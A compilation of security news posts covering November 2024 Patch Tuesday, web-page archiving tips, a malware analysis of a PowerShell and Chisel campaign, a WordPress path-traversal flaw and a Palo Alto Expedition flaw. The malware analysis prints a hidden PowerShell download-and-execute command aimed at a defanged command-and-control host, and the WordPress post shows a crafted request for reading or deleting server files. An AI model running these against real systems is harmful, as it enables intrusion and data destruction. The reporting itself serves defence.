The Patch Tuesday for November of 2024 includes 89 vulnerabilities, including four that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.”

Microsoft assessed that exploitation of the four “critical” vulnerabilities is “less likely.”

CVE-2024-43639 is a remote code execution vulnerability in Windows Kerberos that could be exploited by an attacker by creating a specially crafted application to leverage a vulnerable cryptographic protocol. While considered “critical” it was determined that exploitation is “less likely” and not been detected in the wild.

CVE-2024-43625 is a privilege escalation vulnerability in a VMSwitch driver, which is a networking component of Hyper-V. An attacker could exploit this by sending a specific series of network packets to the driver to trigger a “use after free” vulnerability in the Hyper-V host, allowing the attacker to execute arbitrary code with elevated privileges.Although classified as “critical,” exploitation was deemed “less likely” and the attack complexity considered “high.” Microsoft has not detected active exploitation of this vulnerability in the wild.

CVE-2024-43602 is a remote code execution vulnerability in Azure CycleCloud. Although marked as “critical,” Microsoft has determined that exploitation is “less likely.” If an attacker has gained basic user privileges they may be able to exploit this by sending specially crafted packets to the Azure CycleCloud cluster to gain root privileges. Microsoft has not detected active exploitation of this vulnerability in the wild.

CVE-2024-43498 is a “critical” remote code execution vulnerability in .NET and Visual Studio. Microsoft has assessed exploitation of this vulnerability as “less likely.” A remote attacker could exploit a vulnerable .NET web app by sending specially crafted packets, or loading a specially crafted file into a vulnerable application. In the wild exploitation of this vulnerability has not been detected by Microsoft.

Of the vulnerabilities included in the release, several “important” updates were listed as “exploitation more likely”. These updates are listed below:

• CVE-2024-49033 – Microsoft Word Security Feature Bypass Vulnerability
• CVE-2024-43623 – Windows NT OS Kernel Elevation of Privilege Vulnerability
• CVE-2024-43629 – Windows DWM Core Library Elevation of Privilege Vulnerability
• CVE-2024-43630 – Windows Kernel Elevation of Privilege Vulnerability
• CVE-2024-43636 – Win32k Elevation of Privilege Vulnerability
• CVE-2024-49019 – Active Directory Certificate Services Elevation of Privilege VulnerabilityCisco Confidential
• CVE-2024-43642 – Windows SMB Denial of Service Vulnerability

Additionally, Talos would like to highlight the following “important” vulnerabilities as exploitation has been detected by Microsoft:

• CVE-2024-43451 – NTLM Hash Disclosure Spoofing Vulnerability
• CVE-2024-49039 – Windows Task Scheduler Elevation of Privilege Vulnerability

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62022, 62023, 64218-64224, 64229, 64232 and 64233. There are also Snort 3 rules 301064, 300612, 301065, 301066 and 301073.

Cisco Talos Blog – ​Read More

Contrary to the popular belief that anything online stays online, the internet doesn’t remember everything. In a previous post in this series, we examined no fewer than nine scenarios in which you could lose access to online content. We also provided a detailed guide to what information you absolutely must (and preferably quickly) back up to your computer and how to do it. Today, we’ll discuss how to easily save web pages to your computer, how to organize these archives, and what to do if your favorite site has gone AWOL.

Let’s say you want to save a blog post with a recipe, compile a bibliography for your research paper, or even preserve a specific online publication for legal purposes. All of the above are published as web pages — which have a tendency to disappear at the wrong moment. Want to reminisce about music news and gossip from 2005? Good luck with that — the MTV News site shut down and all its articles and interviews are no longer available. Check references in Wikipedia articles? 11% of them lead nowhere, even though they were working when the article was published. This phenomenon of “link rot” — the gradual deletion or relocation of online content — is rapidly becoming a major problem. 38% of pages that existed ten years ago are no longer accessible today. So, if there’s a web page out there that you like or need, the wise move would be to create a backup.

How to save a web page to your computer

Since a web page consists of dozens or even hundreds of files, backing it up will require a bit of effort. Here are the main ways to do it:

Save only the text as an HTML file. Select the “Save page as…” menu command or button in your browser and then select “Webpage, HTML Only”. This will only save the text of the web page, without any graphics or other eye candy.

Save text and images. The “Webpage, Complete” option will create, besides an HTML file, a folder with the same name containing all graphic elements, styles, and scripts from the page. A downside of this option is that saving a lot of auxiliary files clutters your drive. The “Webpage, Single File” option is more convenient, bundling the web page and all its resources into a single .mhtml file. This will open freely in Chrome or Edge, but other browsers may have issues. This option is not available in all browsers, but if you install the SingleFile extension (available for most browsers), you can save the entire web page and its media content as a single HTML file that opens perfectly fine in all modern browsers.

Print to PDF. To preserve the main content of the page, but scrap menus and banners, your best option is Print to PDF. The resulting file will open on any computer.

With any of these options, make sure that the main text that you actually want to keep is still readable when you open the document.

An easier way to save a web page

The methods described above are a bit time-consuming and create clutter on your hard drive. For greater convenience, use a dedicated service such as Pocket (formerly Read It Later), wallabag, or Raindrop.io. They all work the same way: you send a link from which the service retrieves a document with all the illustrations, cleans the page of anything unnecessary, and saves it in your personal online storage. Even if the original page gets deleted or modified, the version you want will remain in your archive. These services allow you to group and sort your links, search for text inside, and view your saved pages on any device. For desktop, there’s an extension available for all the major browsers; and for mobile, there’s an app.

All these services offer an “eternal” archive only with a premium subscription, meaning you’ll have to pay for the convenience. That said, Wallabag is open-source — you can install it on your own server and not pay for third-party services or worry about the service getting shut down.

Some note-taking apps can also save complete web pages. These include Evernote, where the feature is called “Web Clipper”.

How to save a web page for others

If it’s not just a copy for yourself that you need, but to share a certain version of the page with others, you’ll need a public-archiving service.

The best-known is the Internet Archive (archive.org) and its Wayback Machine. Other options include archive.today (aka archive.is), perma.cc, and megalodon.jp. They all work on a similar principle: either at the user’s request or automatically they visit web pages and save a copy on their servers.

To request archiving of a web page, go to web.archive.org and enter the full address in the Save Page Now box. After you click Save, a window appears describing all of the page’s loaded components, followed by a permanent link to the site in its preserved state. It looks like this: https://web.archive.org/web/20240924045754/https://www.kaspersky.com/blog. The link shows both the address of the saved page and the exact time of saving — perfect for archival purposes.

Registering on archive.org lets you manage a collection of such links, take screenshots of saved sites, and download copies of them in the special web-archiving format.

On opening the archive link, you’ll see the saved page with a timestamp indicating when the snapshot was taken. This feature is useful for tracking and demonstrating changes in website data: price fluctuations, product description updates, edited news reports, and deleted information. The latter is particularly important for historical and cultural researchers based on defunct websites. Below, you can check out one of the first versions of GeoCities, a once popular web-hosting service that let you create “home pages”, express yourself, and find friends with shared interests long before social networks. It’s only thanks to the Wayback Machine that we can see it now — the site closed shop in 2016.

How to find deleted internet content or an old version of a website

To view an old version of any website:

• Open archive.org.
• Enter the full address of the website or a specific page in the box next to the logo and click Enter. If the exact URL is unknown, you can enter the name of the website or words that describe it well.
• Select the desired website from the list. The results show at a glance how many copies are archived and for what period.
• Use the calendar to select which of the saved copies of the site you wish to view. Dates for which there is a saved copy are circled — the larger the circle, the more copies were made that day.
• Click the desired date and inspect the saved site. Note that loading a copy from the archive may take a few minutes.
• The calendar graph above the site copy lets you navigate to older and newer copies.

You can copy the link to the retrieved copy from the address bar to access the archived site directly, bypassing the search interface.

What if archive.org can’t help

The foundation behind archive.org sometimes complies with the requests of copyright holders and other authorized parties to exclude certain sites from the Wayback Machine. Also, the service never aimed to preserve the entire internet, so it may happen that the page you need was never indexed. In such cases, try looking for it in other time capsules.

Archive.today (aka archive.is) doesn’t automatically save pages — it does so only at the request of users. Among other things, this does away with having to follow instructions for search robots (robots.txt), and means that the archive contains documents that aren’t available in the Wayback Machine.

Another important web-archiving project is perma.cc, created by a consortium of major world libraries. However, it’s only free for participating organizations. Individual users can subscribe to a paid plan, with pricing based on the number of archived links.

A powerful alternative to specialized archives is search engines’ cached content. To index any web page, search engines retrieve its text, so a crude but readable version of almost any page can be found there. For a long time, Google’s cache was the most accessible, but in early 2024, the search giant removed the direct link to its cache from search results. The service still works, but accessing it directly is very difficult.

Therefore, it’s better to use browser extensions that make internet archives easier to work with. For example, if a link takes you to a deleted page or a defunct website, the Web Archives extension redirects you straight to an archived copy of this page at web.archive.org, archive.today, or perma.cc, or shows a cached version of it from Google, Bing, or Yandex.

How to save data from other online services

Besides web pages, there are many other online services — from photo albums and notes to social networks — that hold data you also may want to save. Of course, recommendations vary for different types of data and specific services, but for your convenience, we’ve grouped all related instructions under the backup tag. You can read about creating backups for:

• Notion
• Telegram
• WhatsАpp
• 2FA authenticator apps
• Other services

And don’t forget to safeguard your backups against ransomware and spyware!

Kaspersky official blog – ​Read More

Key Takeaways

• Cyble Research and Intelligence Lab (CRIL) has identified a sophisticated campaign employing PowerShell in a multi-stage infection process. 
• The attack initiates with a suspicious LNK file, which activates a PowerShell script designed to download and execute malicious payloads. This layered strategy enhances stealth, evades detection, and ensures prolonged persistence within the target system. 
• In the first stage, the LNK file runs an initial remote obfuscated PowerShell script that establishes persistence by deploying and executing a secondary PowerShell script and batch files. 
• The second-stage PowerShell script continues communication with the command-and-control (C&C) server and executes a third-stage PowerShell script. 
• The third and final stage PowerShell script sends requests for command chains and includes routines to execute received commands as directed by the C&C server. 
• An analysis of the Network infrastructure reveals the presence of a Chisel DLL, suggesting the Threat Actor (TA) may leverage the Chisel client for further C&C communications and to enable lateral movement operations within the compromised network.
• The TA also likely utilizes the Netskope proxy for command and control (C&C) communication with the Chisel server.

Executive Summary

CRIL has recently identified a campaign engaging in a multi-stage infection chain. This chain employs several techniques, starting with the execution of PowerShell scripts. The campaign begins with a malicious LNK file that triggers the execution of a first-stage remote PowerShell script. This script aims to establish persistence on the victim’s system by dropping and running a second-stage PowerShell script. The second-stage script maintains communication with the C&C server, allowing it to download and execute an additional third-stage PowerShell script.

The third-stage script continuously interacts with the C&C server to receive command chains. It executes these commands based on the instructions provided, enabling a variety of malicious activities, such as data exfiltration or lateral movement. The presence of a Chisel DLL on the remote server suggests that the TA may utilize Chisel for advanced operations, including setting up a SOCKS proxy and facilitating lateral movement within the infected network, further strengthening their foothold and enabling stealthy communications.

Technical details:

The infection chain begins when the user inadvertently executes a malicious LNK (shortcut) file. However, the initial infection vector of the LNK file remains unidentified. This LNK file is crafted to run a PowerShell command, which downloads another Base64 encoded PowerShell command from the remote server and then executes it.

The Powershell command uses techniques to bypass Windows security mechanisms, such as setting the PowerShell execution policy to “Bypass,” which allows the script to run without restrictions typically enforced by the system’s security settings. Additionally, the PowerShell window is executed in hidden mode, ensuring that the user does not see any visual indicators of the malicious activity. Following is the PowerShell command:

“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -wind hid $x=wget -UseB -Ur ‘hxxps://c2.innov-eula[.]com/feibfiuzbdofinza’;powershell -wind hid -ep byp -e $x”

The figure below shows the property of the shortcut file.

The figure below displays the Base64-encoded PowerShell script, highlighting the sophisticated methods used to conceal its true functionality.

This de-obfuscated PowerShell script is a sophisticated piece of code engineered to establish persistence and download a PowerShell script from the C&C server. It employs various obfuscation techniques to evade detection and execute its malicious activities stealthily. The figure below shows the de-obfuscated PowerShell script.

First Stage PowerShell Script

In the First Stage, the PowerShell Script performs the following tasks

• Initially, the PowerShell script creates a Hidden directory at “C:UsersMalWorkstationAppDataRoamingMicrosoftLogs” and sets the variable “$HASH” with a seemingly random string, “bdhbzaibdiBKJBJIBDI67869686806656..”. While the exact purpose of this variable is unclear, it could be a placeholder for future use.
• To ensure secure communications, the PowerShell script configures the security protocol to TLS 1.2
• It then retrieves the system’s hostname with the “hostname” command and proceeds to obfuscate this information, converting it to a Base64-encoded string
• This command attempts to retrieve the proxy settings for the specified URL, “hxxp://google.es/,” and constructs the authorization header, appending Base64-encoded hostname.
• If a proxy is configured on the victim’s machine, it uses the proxy to send a request to “hxxps://c2.innov-eula.com/” with the constructed Authorization header. If no proxy is configured, it sends the same request directly without using a proxy.
• The response from the request is stored in the $R variable, which contains a PowerShell script. This script is then saved in the “Logs” folder with the filename “Log_29109314.ps1.” and then executed subsequently.
• The PowerShell script creates two batch files, “Log_29109317.bat” and “Log_29109318.bat,” in the Logs folder. The “Log_29109317.bat” file runs the “Log_29109314.ps1” script, while the “Log_29109318.bat” file moves “Log_29109317.bat” to the startup folder for persistence.

The figure below shows the content of the Logs Folder.

Second Stage PowerShell Script

The second-stage PowerShell script operates similarly to the first one, establishing a connection to the C&C server using the proxies. Once connected, it retrieves the next stage of the attack, which is a PowerShell script encoded in Base64. The script then decodes and executes this Base64-encoded PowerShell script, continuing the attack chain. The figure below shows the contents of the second-stage PowerShell script.

Third Stage PowerShell Script

In the Third Stage, the PowerShell Script performs the following tasks

• The PowerShell script initializes critical variables like “$CHAIN” and “$JITTER” to control its operation. The “$CHAIN” variable tracks the current status of the communication with the Command and Control (C&C) server, while “$JITTER” introduces random delays at various stages to avoid detection by security systems.
• The script then retrieves and encodes the infected machine’s hostname in Base64 and uses it to construct a web request for the system’s proxy settings via “hxxp://google.es/”.
• If “$CHAIN” is “0”, it prepares an Authorization header with the hostname and retrieves data from “hxxps://c2.innov-eula.com/”, using proxy settings if needed. The response is stored in “$CHAIN” to establish communication with the remote server.
• Next, the PowerShell script checks if “$CHAIN” contains invalid characters. If it does, it resets “$CHAIN” to “0” and introduces a random delay. Otherwise, it prepares an Authorization header with “$CHAIN” and hostname and sends a request to “hxxps://c2.innov-eula.com/”.
• The server’s response is split and stored in “$CMD”. If the command is not “WAIT,” it executes a PowerShell command encoded in “$CMD[1]”. The response is then processed and split into chunks, which are sent back to the server in multiple requests.
• The process continues, handling each chunk until the “END” command is received. The PowerShell script is shown below.

The figure below shows the de-obfuscated third-stage PowerShell script.

Open Directory

At the time of execution, we were not able to observe any commands from the C&C server. However, after checking for the network infrastructure, we came across an open directory, “hxxps:/credit-agricole.webdev.innov-eula[.]com”, hosting the malicious LNK file along with other files as shown in the figure below.

Chisel

The open directory contains a suspicious file named chisolo.dll, which is identified as Chisel—a fast TCP/UDP tunneling tool written in Go. Chisel operates over HTTP and is secured via SSH. It uses a single executable for both the client and server, making it particularly effective for bypassing firewalls.

 Chisel has been widely adopted by various threat actors as a powerful tunneling tool, enabling them to pivot into compromised environments with stealth and efficiency. Notable groups such as Sandworm APT, Lorenz Ransomware, and Pysa Ransomware have leveraged Chisel in their campaigns to facilitate lateral movement and maintain persistence.

The Threat Actor can leverage the Chisel tool for various malicious purposes.

Scanning the Internal Network

After compromising the system using the previously mentioned infection, the TA deploys and executes the Chisel client on the compromised machine. This allows the TA to use the infected machine as a SOCKS proxy, enabling them to scan the internal network with tools like Nmap.

Accessing Protected Internal Networks

Once the internal networks are identified, the TA can use the compromised machine to create a tunnel using the Chisel client. This tunnel provides access to networks that are otherwise shielded from external connections, allowing the TA to infiltrate internal systems not exposed to the outside.

Enabling External Connections for Isolated Machines

The TA can also leverage the Chisel client to enable internet access for machines that are otherwise unable to connect. This allows the TA to download additional malicious samples for further exploitation and maintain persistence within the network.

The chisel client sample identified in this campaign has three export functions, as shown below.

The export functions main and xlAutoOpen have code to start the Chisel client on the infected machine, as shown below.

Interestingly, the Threat Actor (TA) is using the IP address 163.116.128[.]80 over port 8080, associated with Netskope, as an explicit proxy. By routing their traffic through this Netskope proxy, we suspect that the TA is likely using this to obfuscate their communications with the C&C server – hxxps://ligolo.innov-eula[.]com.

This approach allows them to bypass traditional network defenses and evade detection, making it difficult for security teams to identify and block malicious C&C traffic. The figure below shows a code snippet used by the Chisel client containing a proxy IP address and C&C URL.

Although direct commands from the C&C server were not observed, the TA likely uses the C&C to issue commands to download and execute the Chisel client on the compromised machine. Once the Chisel tunnel is established between the C&C server and the victim’s machine, this tunnel enables the TA to control the compromised system more effectively. Through this channel, the TA can send specific commands to identify the internal network, move laterally across connected systems, and download additional malicious payloads. These actions enhance the TA’s control and facilitate further malicious activities within the internal environment. The setup effectively provides the TA with a hidden and flexible pathway into internal systems that would otherwise be isolated from external access.

Threat hunting Packages

Our exclusive threat-hunting packages, which include YARA and Sigma rules specifically designed to detect campaigns involving the Chisel tool and related malicious activities.

Additionally, our threat-hunting packages empower organizations to proactively identify and mitigate cyber threats, enabling them to stay ahead of cybercriminals. These packages help detect potential risks and malicious activities before they can cause harm, ensuring a stronger defense against evolving cyber threats.

We have over 15,000 threat-hunting packages and growing. To learn more about how you can gain access to our latest actionable threat intel, click here.

Conclusion

This sophisticated multi-stage PowerShell campaign uses an LNK file to activate a sequence of obfuscated scripts, which maintain persistence and ensure stealth by connecting with a command-and-control (C&C) server. The attack involves Chisel and a Netskope proxy for covert communication, enabling lateral movement within the network. This setup reflects advanced threat actor tactics aimed at prolonged control and evasion, suggesting a highly organized or financially motivated campaign.

Recommendations

• Deploy endpoint detection and response (EDR) solutions that can identify and stop unusual PowerShell activity. Ensure that all endpoints are configured to log PowerShell command executions and unusual file behaviors, such as LNK file executions from non-standard locations.
• Limit access to PowerShell and other scripting tools based on user roles. Where possible, apply “constrained language mode” to restrict the types of commands that can be executed.
• Monitor network traffic for unusual connections, particularly those using uncommon ports or protocols (such as Chisel’s tunneling). Network segmentation can limit lateral movement, restricting an attacker’s access even if they compromise one segment.
• Train users to recognize and avoid suspicious links or files, particularly those delivered via email or other messaging platforms. Regular phishing simulations and awareness training can help prevent the initial compromise.
• Implement MFA on all sensitive systems. It can help prevent unauthorized access, even if credentials are compromised. This is especially important for privileged accounts that can execute PowerShell or access sensitive segments of the network.
• Integrate threat intelligence feeds that include indicators of compromise (IOCs) related to C&C servers, known malicious IP addresses, and techniques like Chisel tunneling. This intelligence can aid in detecting and blocking attacks that match these patterns.

MITRE ATT&CK® Techniques

Tactic	Technique ID	Procedure
Initial Access (TA0027)	Phishing (T1660)	The campaign starts with a suspicious LNK file that executes a PowerShell script. The script downloads and runs malicious payloads from the C2 server.
Execution (TA0041)	Command and Scripting Interpreter: PowerShell (T1059.001)	The PowerShell script executes and downloads additional malicious payloads from a remote server.
Persistence (TA0028)	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder  (T1547.001)	Batch file is dropped in the startup folder.
Defense Evasion (TA0030)	Obfuscated Files or Information (T1027)	Use of obfuscated PowerShell scripts and tunneling tools to hide activity from traditional security mechanisms.
Command and Control (TA0037)	Application Layer Protocol: Web Protocols (HTTP/S) (T1071.001)	Chisel is used to create a tunnel to the C2 server, allowing further control over the infected system.

Indicators of Compromise (IOCs)

Indicators	Indicator Type	Description
6c7636e21311a2c5ab024599060d468e03d8975096c0eb923048ad89f372469e	SHA256	LNK File
8e812bb7fde8c451d2a5efc1a303f2512804f87f041b1afe2d20046d36e64830	SHA256	Log_29109314.ps1
319beca16c766f5b9f8cc4ba25f0b99f1b4769d119eb74dfd694d3f49a23a5b9	SHA256	Log_29109318.bat
0169283f9df2d7ba84516b3cce50d93dbb6445cc6b2201459fa8a2bc3e319ea3	SHA256	Log_29109317.bat
6332d328a6ddaa8f0c1b3353ee044df18e7867d80a0558823480bd17c14a24bc	SHA256	Chisel DLL
hxxps://ligolo.innov-eula[.]com	Domain	C&C
hxxps://c2.innov-eula[.]com	Domain	C&C
hxxps://c2.innov-eula[.]com/feibfiuzbdofinza	URL	C&C
hxxps://credit-agricole.webdav[.]innov-eula.com/	URL	Open Directory

The post Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaign appeared first on Cyble.

Blog – Cyble – ​Read More

Overview 

A critical path traversal vulnerability, CVE-2024-10470, has been identified in the WPLMS Learning Management System (LMS) theme for WordPress. This vulnerability enables unauthenticated attackers to read and delete arbitrary files on the server due to insufficient file path validation in the theme’s readfile and unlink functions.  

The flaw affects all versions of WordPress up to and including 4.962 and carries a CVSS score of 9.8. 

According to the bug description published on GitHub under the account moniker RandomRobbieBF, the flaw impacts WordPress sites running WPLMS even if the theme is not actively enabled. This likely puts thousands of LMS-driven websites at risk of unauthorized data access, site disruption, and potential full system compromise. 

The CVE-2024-10740’s original finding is attributed to an independent researcher Friderika Baranyai, aka Foxyyy. 

Vulnerability Details 

• CVE: CVE-2024-10470 
• Type: Path Traversal (CWE-22) 
• Affected Theme: WPLMS Learning Management System for WordPress 
• Affected Versions: <= 4.962 
• Severity: Critical (CVSS 9.8) 
• Impact: Confidentiality, Integrity, Availability 
• Found By: Friderika Baranyai, aka Foxyyy 

Exploitation Details 

This vulnerability allows attackers to delete critical files, such as wp-config.php, without needing authentication. Deleting this file, which contains essential WordPress configuration settings, could enable attackers to gain remote control over the affected server, leading to potential code execution and full site compromise. 

While there is no publicly available proof-of-concept (PoC) or evidence of active exploitation, the nature of this vulnerability means that attackers could send crafted requests to delete or read files arbitrarily.  

For example, the download_export_zip parameter within certain WPLMS theme scripts can be exploited to read or delete sensitive server files, leading to significant security risks for affected WordPress installations. 

A sample crafted request, as described on GitHub, which could exploit this vulnerability is as follows: 

POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1 

Host: [Target-IP] 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 29 

download_export_zip=1&zip_file=.htaccess 

This request manipulates the zip_file parameter to target and potentially delete files like .htaccess, which could lead to server misconfiguration or unauthorized file access. 

Mitigation and Recommendations 

Website administrators are advised to take the following actions to address this bug: 

1. Deactivate and Remove the WPLMS Theme: If possible, temporarily deactivate the WPLMS theme until a patch is available. Remove it if it’s not essential to your website’s functionality. 
2. Apply Strong Access Controls: Restrict access to critical files, such as wp-config.php, and ensure that file permissions are strictly enforced to prevent unauthorized deletion or modification. 
3. Implement File Integrity Monitoring: Regularly monitor the integrity of critical WordPress files. Immediate alerts on file deletion or modifications can provide timely warnings of potential exploitation. 
4. Back Up WordPress Installations Regularly: Maintain regular backups of your website’s files and database to ensure rapid recovery in the event of an attack. 
5. Web Application Firewall (WAF): Use a WAF to filter potentially malicious requests. This can help prevent attackers from exploiting path traversal vulnerabilities. 
6. Monitor for Updates: Regularly check for updates from the WPLMS theme developer and apply any available patches as soon as they are released. The vulnerability is resolved in version 4.963, so updating to this version will eliminate the risk. 
7. Isolate WordPress Installations: For sites heavily dependent on the WPLMS theme, consider isolating the installation in a separate, highly controlled environment to reduce the risk of lateral movement if exploited. 

Conclusion 

The CVE-2024-10470 vulnerability in the WPLMS theme for WordPress represents a severe security threat to affected websites. By allowing unauthenticated file deletion, this flaw poses risks of unauthorized access, remote code execution, and potential full compromise of WordPress installations. 

Administrators are urged to take immediate steps to secure their systems, including deactivating the theme if feasible, implementing access controls, and applying security patches as soon as they are available. 

Following these recommendations, organizations can mitigate potential exploitation and protect their WordPress environments from unauthorized access and service disruption. 

Source: 

https://nvd.nist.gov/vuln/detail/CVE-2024-10470
https://github.com/RandomRobbieBF/CVE-2024-10470
https://themeforest.net/item/wplms-learning-management-system/6780226
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/wplms/wplms-learning-management-system-for-wordpress-4962-unauthenticated-arbitrary-file-read-and-deletion
https://www.wordfence.com/threat-intel/vulnerabilities/researchers/friderika-baranyai

The post Path Traversal Vulnerability in WPLMS WordPress Theme Exposes Websites to RCE  appeared first on Cyble.

Blog – Cyble – ​Read More

Overview

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday alerted federal agencies regarding active exploitation of a critical missing authentication vulnerability in Palo Alto Networks’ Expedition, a tool widely used by administrators for firewall migration and configuration management.

This flaw, designated CVE-2024-5910, has been actively exploited by attackers since its patch release in July, underscoring the urgency for immediate remediation.

Expedition is a popular migration tool designed to assist administrators in transitioning firewall configurations from vendors such as Check Point and Cisco to Palo Alto’s PAN-OS. However, due to a missing authentication mechanism, this tool now presents a significant risk for compromised credentials and potentially severe network intrusions.

What is CVE-2024-5910 Vulnerability

The CVE-2024-5910 vulnerability in Palo Alto Networks’ Expedition tool is a missing authentication flaw, which allows an attacker with network access to exploit the vulnerability and take over an admin account.

Once exploited, attackers can potentially gain access to sensitive configuration secrets, credentials, and other data stored within the tool. This flaw carries a critical CVSSv4.0 base score of 9.3.

According to Palo Alto Networks, only Expedition versions below 1.2.92 are vulnerable, while all versions from 1.2.92 and onward are protected against this flaw. As CISA emphasized, the lack of authentication on such a critical function poses severe security risks, especially for government and enterprise environments relying on Expedition for firewall migration and tuning.

Technical Details and Vulnerability Summary

• Vulnerability: CVE-2024-5910 (Missing Authentication for Critical Function)
• Severity: CRITICAL (CVSSv4.0 Score: 9.3)
• Affected Versions: Expedition versions below 1.2.92
• Unaffected Versions: Expedition 1.2.92 and later
• Weakness Type: CWE-306, Missing Authentication for Critical Function
• Impact: Admin account takeover, access to sensitive configuration data, potential firewall control

Likely Reason for Exploitation of CVE-2024-5910

Although Palo Alto Networks initially released a patch in July to fix CVE-2024-5910, the exploitation attempts likely escalated when security researcher Zach Hanley from Horizon3.ai released a proof-of-concept (PoC) in October.

This PoC showed how CVE-2024-5910 admin reset vulnerability could be chained with another command injection vulnerability – CVE-2024-9464. This combination allows for unauthenticated, arbitrary command execution on vulnerable Expedition servers, enabling attackers to execute commands remotely.

This chained vulnerability scenario magnifies the risk, as attackers can exploit the admin reset vulnerability to ultimately compromise PAN-OS firewall admin accounts, providing full control over firewall configurations and potentially allowing access to sensitive network areas.

CISA’s Known Exploited Vulnerabilities Catalog Update

Adding to the urgency, CISA has included CVE-2024-5910 in its Known Exploited Vulnerabilities (KEV) Catalog. This addition mandates all U.S. federal agencies to secure vulnerable Expedition servers against potential attacks by November 28. This move underscores the federal directive for securing essential digital infrastructure against known vulnerabilities, especially those that facilitate admin credential resets and remote command execution.

Recommendations and Mitigations

To secure systems against this exploit, it is strongly recommended that administrators:

1. Upgrade Expedition to Version 1.2.92 or Later: This release addresses CVE-2024-5910 and subsequent vulnerabilities, providing a robust safeguard against admin account takeover and unauthorized access.
2. Rotate All Credentials Post-Upgrade: After updating to the latest version, administrators should rotate all Expedition usernames, passwords, and API keys. Additionally, all firewall usernames, passwords, and API keys processed through Expedition should be reset to prevent any potential misuse of compromised credentials.
3. Restrict Network Access: As a mitigating measure, organizations unable to immediately apply the patch should restrict network access to Expedition servers to authorized users and hosts only. Network segmentation and access control lists (ACLs) should be employed to limit exposure.

Conclusion

The exploitation of CVE-2024-5910 exemplifies the persistent challenge organizations face in securing digital tools that facilitate network management and firewall configuration. Regular patching, vigilant credential management, and access control are fundamental to safeguarding critical infrastructure against similar vulnerabilities.

With CISA actively monitoring this threat and urging patching compliance, addressing this vulnerability is essential not only for regulatory compliance but for maintaining network security integrity.

By upgrading to the latest version of Expedition and implementing the outlined mitigations, organizations can strengthen their defenses against these specific exploits and prevent unauthorized access to network configurations.

Sources:

https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-5910&field_date_added_wrapper=all&field_cve=&sort_by=field_date_added&items_per_page=20&url=

https://security.paloaltonetworks.com/CVE-2024-5910

https://github.com/horizon3ai/CVE-2024-9464

The post CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild appeared first on Cyble.

Blog – Cyble – ​Read More